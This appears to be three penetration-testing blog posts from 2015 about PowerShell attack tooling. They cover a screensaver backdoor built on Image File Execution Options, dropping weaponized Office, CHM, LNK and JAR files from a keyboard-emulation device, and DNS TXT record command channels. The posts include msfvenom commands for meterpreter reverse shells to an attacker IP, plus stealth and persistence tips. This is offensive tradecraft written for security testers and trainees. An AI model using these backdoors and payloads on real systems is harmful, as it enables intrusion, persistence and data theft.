Saturday, February 28, 2015

Using Windows Screensaver as a Backdoor with PowerShell

I came across this interesting post about bypassing Windows Lock Screen via Flash Screensaver. While bypassing the lock screen is useful, the method mentioned there needs physical access to the target. This feature of Windows could be used for much more fun without physical access. The fact that Screensaver would run our payload whenever the target would be idle makes it much useful as a backdoor. 
Lets see!

Using below simple PowerShell command, from an elevated shell, we can run an executable whenever Screensaver timeout occurs, assuming that the Screensaver in use is the built-in Ribbons.scr
And when the timeout occurs we have a command prompt (which may keep running in a loop). Fun, but needs physical access!

To quickly test screensaver execution, I used MonitorES from here.

Using PowerShell, we can do some neat stuff with this. For example, using the below one liner we can download and execute scripts. We can always change the script on the webserver so a new script could be executed everytime the screensaver starts.
Above could be used to execute PowerShell scripts and modules.

Now, to make it less suspicious for a user, we should be able to launch the screensaver alongwith our command/script. Let me give you, Add-ScrnSaveBackdoor.

Add-ScrnSaveBackdoor

It reads the value of Windows registry key HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE to check for the existing Screensaver. If none exists, one from the default ones which exist in C:\Windows\System32 is used.

A Debugger to the screensaver is created at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\. It is the value of the "Debugger" to this key where it writes the payload. A screensaver selected from the default ones is added to this payload. When the payload is executed, the screensaver also runs after it to make it appear legit.

Below command shows how to use Add-ScrnSaveBackdoor to execute FireBuster from Nishang for Egress Testing. The FireListener must be started on the attacker's machine:

Below command executes HTTP-Backdoor from Powerpreter:

And use the below command to execute an in-memory meterpreter in PowerShell format generated using msfvenom (./msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.254.226 -f powershell):
Aaaand...

Bingo! With the help of PowerShell, we used this method which required physical access for remote access. It works fine with the "On resume, display logon screen" setting. We can always change contents of the script URL to execute different scripts using the same backdoor.

The source for Add-ScrnSaveBackdoor could be found in Nishang github repo.

Below video shows a walkthrough of the source code and shows Add-ScrnSaveBackdoor in action to pop a reverse_https meterpreter.

Meh!

Administrative  privilege (elevated shell) is required to use Add-ScrnSaveBackdoor.

SCRNSAVE.EXE could be used for evil is known for much longer time. http://www.securityfocus.com/archive/1/434926/30/0/threaded

"Image File execution Options" could be used for evil is also known. So AV *may* catch it.

This setting "can be superceded by the No screen saver Group Policy"



Hope you enjoyed this! Please leave comments and feedback.

If you like this and want to learn more, please checkout my two day training "PowerShell for Hackers" at Troopers 15 on 16th-17th March (https://www.troopers.de/events/troopers15/292_powershell_for_hackers/) or other trainings I am doing at various conferences in the right pane.

Tuesday, January 27, 2015

Dropping infected/weaponized files using a Human Interface Device

This post discusses dropping infected/weaponized files on a target using a Human Interface Device. I am always against using mounted SD cards in a HID. In my experience, it increases the chances of detection and blocking. Using HID without SD card limits the capability of dropping files to much extent. But it is still possible to drop files using HID, a Teensy 3.0, without having to mount additional storage.

Kautilya now has a new category of attacks - "Drop Files". Following payloads have been added.
- Drop a MS Word file
- Drop a Excel file
- Drop a CHM (Compiled HTML Help) file
- Drop a Shortcut (.LNK) file
- Drop a JAR file


Lets have a look at these payloads.

Drop a MS Word file

Use this to drop a MS Word file on a target. The Word file contains an auto executable Macro which executes when the document is opened. PowerShell commands and scripts could be executed. While a command could be simply provided as an option, to execute a script following PowerShell one-liner should be used:
Below screenshot shows a screen for this payload.


The generated sketch needs to be uploaded to a HID. On a target, the HID drops a PowerShell script which generates the infected MS Word file on the Desktop of current user. 

Drop a MS Excel file

This payload is similar to the MS Word payload so no need of looking at it. PowerShell scripts and commands could be passed in the same way to it.

Drop a CHM (Compiled HTML Help) file

This payload drops a weaponized CHM file on a target. Since, compiling CHM files requires HTML Help Workshop, the CHM file is generated on attacker's machine, compressed into a zip archive and byte encoded. This encoded file is written to the HID as a byte array and is then dropped on the target as a zip archive and decompressed. The byte array is quite big even after compression so the time taken by HID to type it on a target is much longer than other payloads. Kautilya shows a warning when this payload is selected.

We have to use Out-CHM in the extras directory of Kautilya to generate the CHM. The script also compresses it and creates a byte encoded text file from it. From a PowerShell prompt use this:
Note that we must have HTML Help Workshop installed on the attacking machine. It could be downloaded from here: http://www.microsoft.com/en-us/download/details.aspx?id=21138

Above command outputs a text file encodedchm.txt. It has to be copied to lib/src directory in Kautilya. The file is read by Kautilya and the sketch (.ino file) is generated to be written to HID.
On a victim, the HID drops the zip, uncompresses it, deletes zip and leaves the CHM on the current user's desktop.

Drop a Shortcut (.LNK) file

This payload drops a shortcut file (.lnk) on a target machine. The shortcut is set to the path powershell.exe which is. by default, same on every machine and the command/script is passed as an argument to it. We can also assign hotkey and icon to the shortcut. Interestingly, assigning a hotkey means every time the user presses that key our weaponized shortcut file would execute ;)

When the HID is connected to a target. A shortcut is created on the current user's desktop. Whenever a user clicks on the shortcut or presses the hotkey the specified command or script would be executed.

Drop a JAR file

Use this payload to drop a JAR file on a target. Like the CHM file attack, the JAR is to be created using Out-Java in the extras directory. This payload also takes much more time than other paylods in Kautilya.
From a PowerShell prompt use this:
Above command outputs a text file encodedjar.txt. It has to be copied to lib/src directory in Kautilya. The file is read by Kautilya and the sketch (.ino file) is generated to be written to HID.
On a victim, the HID drops the JAR on the current user's desktop.

Below video shows the MS Word attack in action. Its my first video so please share your feedback :)


Neat!

So we can drop weaponized files on a target while using only the Keyboard emulation on a programmable HID. A useful addition to an attacker's toolchest. Kautilya could be found here: https://github.com/samratashok/Kautilya

Hope you enjoyed this!

I am doing trainings on "PowerShell for Penetration Testers" during March 2015.  A one day training at CanSecWest on 14th March (details here) and a two day training at Troopers on 16th-17th March 2015 (details here).

Tuesday, January 20, 2015

Fun with DNS TXT Records and PowerShell

This post discusses using DNS TXT records with PowerShell for command, script and shellcode execution . Nishang and Kautilya have two payloads and data exfiltration methods based on DNS TXT records. There was a lot of room for improvement and there has been some considerable changes in the payloads.

Out-DnsTxt


We need a DNS server under our control to create TXT records. I use ZoneEdit.com for this. Nishang now has a new script called Out-DnsTxt.ps1 under the Utility category. This script takes as input a PowerShell script, command or a shellcode and outputs a text file containing compressed and Base64 encoded strings. Each newline separated string is the value we need to save as TXT record on our DNS. The lenght of a DNS TXT record assumed by the script is 255 characters.

Lets see an example. Below command encodes Get-Process cmdlet.

As the input was small Out-DnsTxt notified that only one TXT record needs to be created. Lets save it to command.alteredsecurity.com


Lets try it with a full script.

This time Out-DnsTxt tells us that three txt records need to be created. The encodedtxt.txt looks like this:
It would be better if the help is removed from a script before it is encoded to save space. Though, we have not done it in the above example.

Each line of this encoded script goes into a TXT record. Lets create three TXT records 1.alteredsecurity.com, 2.alteredsecurity.com and 3.alteredsecurity.com each containing a line from encodedtxt.txt. Lets query 1.alteredsecurity.com for its TXT records and see what it contains.



Now to use these, we have to use DNS_TXT_Pwnage backdoor from Nishang.

DNS_TXT_Pwnage

This backdoor is capable of receiving PowerShell commands and scripts from TXT records. Lets try running the command we saved to command.alteredsecurity.com.

And the result is:

Great! Here's how it works.

The contents of TXT records of StartDomain are compared with Cmdstring and PsString for instructions. If its contents matches Cmdstring, the CommandDomain is queried for a Command as in the above case and if its contents match PsString, the PSDomain is queried. The parameter Subdomain specify the number of subdomains of PSDomain which must be queried.

Lets see an example where we try running a script. We just need to change the content of start.alteredsecurity.com to "startscript" which is our magic string for executing scripts. As we have provided Subdomains 3, the script would query 1.script.alteredsecurity.com upto 3.script.alteredsecurity.com. Here is how the ZoneEdit control panel looks right now:

Ok, now when we run the above command, this is the result.

Neat! We executed Get-WLAN-Keys on the target. This opens up a very useful channel for communication.

DNS_TXT_Pwnage also provides exfiltration and reboot persistence capabilities similar to other backdoors in Nishang. While those could be seen in the script help, particluarly interesting to mention here is the DNS exfiltration option. If you have control over a DNS server which logs TXT queries made to it, it could be used for exfiltration.

I have blogged about exfiltration in detail in this post:

This is how the DNS server log may look:
Use Invoke-Decode from Utility directory to decode the above.

Now, lets try to drop some infected MS Word documents on a target using this script. We will use Out-Word from the Client directory for this. Since Out-Word needs arguments to be passed to it, lets make the function call from the script itself and remove the help. Out-DnsTxt shows the difference clearly. Before removing help 14 TXT records need to be created, after doing that only 9:

After creating 1 to 9.word.alteredsecurity.com, lets use DNS_TXT_Pwnage on the target:


Awesome! We are able to drop malicious/infected/weaponized Word documents with the help of DNS TXT records. Note the use of the parameter NoLoadFunction, it has been used because we were making the function call for Out-Word from the script itself.


Some pecularities to note for DNS_TXT_Pwnage: 
1. NoLoadFunction
This parameter is used for specifying that the script used in txt records $psdomain does NOT load a function. If the parameter is not specified the payload assumes that the script pulled from txt records would need function name to be executed. This need not be specified if you are using scripts from any popular PowerShell security tool.
2. AuthNS
If AuthNS, that is the Authorized NameServer of the domain under our control, is specified, the changes done to TXT records are almost immediately available to the backdoor running on the target. For example, you could remotely stop the backdoor by modifying the TXT record of start.alteredsecurity.com in above example if you are using AuthNS. Without AuthNS, it would take a longer time. But the flip side is that chances of detection increases. To avoid detection, it would be better to leave the query resolution to the target's default nameserver.

We could always use separate domains. One for serving instructions, another for commands, another one for scripts etc. It depends on the stealth requirements.

Now, lets try to execute shellcode.

Execute-DNSTXT-Code

Execute-DNSTXT-Code could be used to execute shellcode using the TXT records. 

Use below command to generate a shellcode using msfvenom:

./msfvenom -p windows/x64/meterpreter/reverse_https -f powershell LHOST=192.168.254.226 > pspayload64.txt

The above shellcode is encoded and Out-DnsTxt informs that 5 TXT records need to be created. Lets create 1.64.alteredsecurity.com to 5.64.alteredsecurity.com for 64 bit target and 1.32.alteredsecurity.com to 5.32.alteredsecurity.com. The script is able to check if it is running on a 64-bit PowerShell process or 32-bit, the appropriate domains are queried for shellcode.

To use the TXT records generated using Out-DnsTxt for above, we have to use Execute-DNSTXT-Code from Execution directory in Nishang.

And here is the result.
Bingo! A meterpreter served using DNS TXT records and the execution takes place entirely in memory!

Updated Nishang code could be find here: https://github.com/samratashok/nishang

That is all! Hope you enjoyed this. Feedback and bug reports are welcome.

If this looks interesting to you, I am doing trainings on "PowerShell for Penetration Testers" during March 2015.  A one day training at CanSecWest on 14th March (details here) and a two day training at Troopers on 16th-17th March 2015 (details here).